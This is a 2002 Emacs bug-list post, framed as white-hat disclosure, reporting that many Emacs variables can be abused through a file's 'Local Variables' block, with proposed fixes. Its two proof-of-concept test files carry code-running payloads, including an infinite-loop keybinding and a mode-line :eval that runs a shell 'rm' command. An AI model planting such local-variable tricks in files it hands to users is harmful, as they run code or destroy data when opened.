From mboxrd@z Thu Jan  1 00:00:00 1970
Path: main.gmane.org!not-for-mail
From: Jonathan Yavner <jyavner@comcast.net>
Newsgroups: gmane.emacs.bugs
Subject: Security holes in risky-local-variable system
Date: Tue, 26 Mar 2002 16:45:52 GMT
Organization: Giganews.Com - Premium News Outsourcing
Sender: bug-gnu-emacs-admin@gnu.org
Message-ID: <3CA0A5F7.DD46E3BF@comcast.net>
NNTP-Posting-Host: localhost.gmane.org
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
X-Trace: main.gmane.org 1017161295 11362 127.0.0.1 (26 Mar 2002 16:48:15 GMT)
X-Complaints-To: usenet@main.gmane.org
NNTP-Posting-Date: Tue, 26 Mar 2002 16:48:15 +0000 (UTC)
Original-Received: from fencepost.gnu.org ([199.232.76.164])
	by main.gmane.org with esmtp (Exim 3.33 #1 (Debian))
	id 16pu7K-0002x9-00
	for <gnu-bug-gnu-emacs@m.gmane.org>; Tue, 26 Mar 2002 17:48:14 +0100
Original-Received: from localhost ([127.0.0.1] helo=fencepost.gnu.org)
	by fencepost.gnu.org with esmtp (Exim 3.34 #1 (Debian))
	id 16pu7I-0008Nt-00; Tue, 26 Mar 2002 11:48:12 -0500
Original-Received: from chi6-1.relay.mail.uu.net ([199.171.54.98])
	by fencepost.gnu.org with smtp (Exim 3.34 #1 (Debian))
	id 16pu56-0008KS-00
	for <bug-gnu-emacs@prep.ai.mit.edu>; Tue, 26 Mar 2002 11:45:56 -0500
Original-Received: from mw5.texas.net by chi6sosrv13.alter.net with ESMTP 
	(peer crosschecked as: mw5.texas.net [206.127.30.15])
	id QQmhwl06517
	for <gnu-emacs-bug@moderators.isc.org>; Tue, 26 Mar 2002 16:45:54 GMT
Original-Received: from bin6.nnrp.aus1.giganews.com (bin6.nnrp.aus1.giganews.com [216.166.71.46])
	by mw5.texas.net (8.11.6/8.11.6) with ESMTP id g2QGjrs13611
	for <gnu-emacs-bug@moderators.isc.org>; Tue, 26 Mar 2002 10:45:53 -0600 (CST)
Original-Received: by bin6.nnrp.aus1.giganews.com (8.10.2+Sun/8.10.2) id g2QGjqG01461;
	Tue, 26 Mar 2002 10:45:52 -0600 (CST)
Original-To: gnu-emacs-bug@moderators.isc.org
Original-Path: not-for-mail
X-Mailer: Mozilla 4.74 [en]C-AtHome0407  (Win98; U)
X-Accept-Language: en
Original-Newsgroups: gnu.emacs.bug
Original-Lines: 110
Original-NNTP-Posting-Date: Tue, 26 Mar 2002 10:45:52 CST
Original-X-Trace: sv3-PGO2rM2x5KQyFSPFegm5F8F0d3S3AfKD6meteDVonR0uhz8To8gLz8V24eCBMRmpbVunUB7wpy9cVu3!XrbX8H3PX79izf3ygIjR+s4yF6rM6vxIV/+Y8yFKeMYF18DkbgA=
Original-X-Complaints-To: abuse@comcast.com
X-DMCA-Complaints-To: abuse@comcast.com
X-Abuse-Info: Please be sure to forward a copy of ALL headers
X-Abuse-Info: Otherwise we will be unable to process your complaint properly
Errors-To: bug-gnu-emacs-admin@gnu.org
X-BeenThere: bug-gnu-emacs@gnu.org
X-Mailman-Version: 2.0.5
Precedence: bulk
List-Help: <mailto:bug-gnu-emacs-request@gnu.org?subject=help>
List-Post: <mailto:bug-gnu-emacs@gnu.org>
List-Subscribe: <http://mail.gnu.org/mailman/listinfo/bug-gnu-emacs>,
	<mailto:bug-gnu-emacs-request@gnu.org?subject=subscribe>
List-Id: Bug reports for GNU Emacs,
	the Swiss army knife of text editors <bug-gnu-emacs.gnu.org>
List-Unsubscribe: <http://mail.gnu.org/mailman/listinfo/bug-gnu-emacs>,
	<mailto:bug-gnu-emacs-request@gnu.org?subject=unsubscribe>
List-Archive: <http://mail.gnu.org/pipermail/bug-gnu-emacs/>
Xref: main.gmane.org gmane.emacs.bugs:201
X-Report-Spam: http://spam.gmane.org/gmane.emacs.bugs:201

Version: GNU Emacs 21.1.1 (i386-msvc-windows98.1998)

!!!This is intended as a white-hat post.  No flames, please!!!


These variables are risky and should have the risky-local-variable
attribute:
    auto-mode-alist
    minor-mode-overriding-map-alist
    overriding-local-map
Any of these could be used in the "Local Variables" area of a file in
order to create a Trojan horse; see test files below.

Another Trojan-horse method uses the frame parameter
`buffer-predicate', so any variable that defines frame parameters is
risky:
    default-frame-alist
    initial-frame-alist
    pop-up-frame-alist
    special-display-buffer-names
    special-display-frame-alist

The font-lock system uses callback functions, so its variables are
risky if global-font-lock-mode is enabled.  Also, the font-lock
initialization will happily set any variable for you, even those with
the risky-local-variable property:
    font-lock-defaults
    font-lock-keywords
    font-lock-syntactic-keywords

Because display properties can contain forms to be evaluated later,
any variable containing text that might be inserted into a buffer is
risky.  Examples:
    buffer-undo-list
    default-directory
    default-text-properties
I'm sure of these (see test files below), but there could be many
others.  Perhaps what's needed is a variable "display-eval-enable"
default nil, with risky-local-variable property?  Such a variable
would close this entire loophole, except in modes that really want it.

Because of the :eval keyword, any variable used for mode-line
formatting is also risky.  Examples:
    frame-title-format, global-mode-string, header-line-format,
    icon-title-format, input-method-alist, minor-mode-alist,
    mode-line-buffer-identification, mode-line-format,
    mode-line-frame-identification, mode-line-modified,
    mode-line-mule-info, mode-line-process, vc-mode
How about a new variable "mode-line-eval-enable", with
risky-local-variable property, default '(mode-line-mode-name), which
would be a list of functions that :eval would accept, or t to accept
everything?



Test file #1:  (give it the filename "x", change "$" below to ":",
                save, and reload)
...........snip here...................................................
For a moment's amusement, load this file and immediately type
  C-c r a s h
Maximize your enjoyment by not saving your other buffers first!

Other fun things to try:
  C-_
  C-x C-f x RET C-x k RET

;;; Local Variables$
;;; overriding-local-map: (keymap (3 . (lambda ()
       (interactive)
       (while 1))))
;;; buffer-undo-list: (nil (#("Fun" 0 3 (display (height
       (progn (message "@buffer-undo-list") 2)))) . 1))
;;; default-directory: #("/tmp/" 0 5 (display (height
       (progn (message "@default-directory") 2))))
;;; mode-line-format: (:eval (progn
       (shell-command "rm /UNLIKELY/FILENAME*")
       "@mode-line-format"))
;;; End:
...........snip here...................................................



Test file #2:  (call it "x.el", enable global-font-lock first,
                change "$" below to ":", save and reload)
...........snip here...................................................
Some fun things to try:
  C-a C-\
  C-x C-w x RET
  C-x 5 2 C-x b RET

;;; Local Variables$
;;; auto-mode-alist: (("." . (lambda () (message "@auto-mode-alist"))))
;;; default-frame-alist: ((buffer-predicate . (lambda (x)
       (message "@default-frame-alist"))))
;;; font-lock-defaults: (((eval . (message "@font-lock-defaults#1")))
                   nil nil nil
                   (lambda (&rest x) (message "@font-lock-defaults#2"))
                   (load-path "@font-lock-defaults#3/"))
;;; mode: Outline-minor
;;; minor-mode-overriding-map-alist: ((outline-minor-mode keymap
                  (1 . (lambda () (interactive)
                       (error "@minor-mode-overriding-map-alist")))))
;;; default-text-properties: (display (height
               (progn (message "@default-text-properties") 0.5)))
;;; header-line-format: (:eval (message "@header-line-format"))
;;; input-method-alist: (("latin-1-prefix" "English"
          (lambda (x) (message "@input-method-alist"))
          "@" "Making trouble"))
;;; End:
..........snip here...................................................